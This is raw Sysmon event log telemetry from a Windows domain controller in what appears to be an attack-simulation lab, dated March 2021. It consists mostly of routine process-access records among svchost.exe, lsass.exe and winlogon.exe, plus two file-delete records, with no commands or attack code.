12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-64C1-6064-9300-00000000AE01}872NT AUTHORITY\SYSTEMC:\Windows\system32\LogonUI.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.dbMD5=F3DC4461F59519C68ABD86B979EA9762,SHA256=5896967D61C1C716C98511DCFC267A12749D330E5DEB35ECCB4690DFA756C964,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23e0b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\Sys
tem32\KERNEL32.DLL+84d4 10341000x80000000000000004285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+37c3|c:\windows\system32\SYSNTFY.dll+1dcb|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.809{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E823BA27668F27EE90EAA44AF3F91F13,SHA256=F8A02054A5C05B0B8AD3536935FB038B403A1358C32BF7B957DF690F69A7E706,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.793{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.793{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.793{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
